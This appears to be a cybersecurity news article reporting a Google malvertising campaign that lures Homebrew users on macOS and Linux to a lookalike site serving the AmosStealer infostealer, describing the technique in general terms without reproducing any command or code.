HQ/EMEAFind out how we can help your business
Hackers are once again using Google advertising to spread the AmosStealer malware. Reports revealed that this new attack could compromise Macs and Linux devices using an infostealer to harvest credentials, browser data, and crypto wallets.
Moreover, the virus in this operation could serve as Malware-as-a-Service, as cybercriminals can rent it for a monthly subscription of $1,000.
Researchers have observed the new strain in various malvertising campaigns promoting bogus Google Meet conferencing pages. This prevalence has made it one of the most sought-after infostealers among cybercriminals who target Apple devices.
Homebrew users are the target of the new AmosStealer malware.
The AmosStealer operators may have prioritised targeting Homebrew users who own Apple products since it is a popular open-source package manager for macOS and Linux that lets an individual install, update, and manage software using the command line.
Investigations show that fraudulent Google advertising featured the correct Homebrew URL, “brew.sh,” deceiving even some of the most experienced users into clicking it. However, this link would redirect the users to a phoney Homebrew site stored at “brewe.sh”.
Malvertising campaigns have extensively exploited this URL strategy to fool users into visiting what appears to be an authentic website for a project or firm.
Once the visitor arrives at the site, the malware operation may request that they install Homebrew by copying and pasting a command from the macOS Terminal or Linux shell prompt. However, running the command displayed on the bogus website will download and execute malware on the device.
Reports revealed that the malware injected in this instance is a potent infostealer that targets over 50 cryptocurrency extensions, desktop wallets, and online browser data.
On the other hand, one of Homebrew’s project leaders insisted that the project was aware of the situation. However, it was beyond its control, and Google was allegedly blamed for the lack of oversight.
The malicious ad has been removed, but the campaign could still run through other redirection domains; hence, Homebrew users should be aware of sponsored project advertisements.
Fraudulent advertising continues to appear in Google Search results for various queries, including Google advertising itself, exposing more users to possible exploits and malware infections.
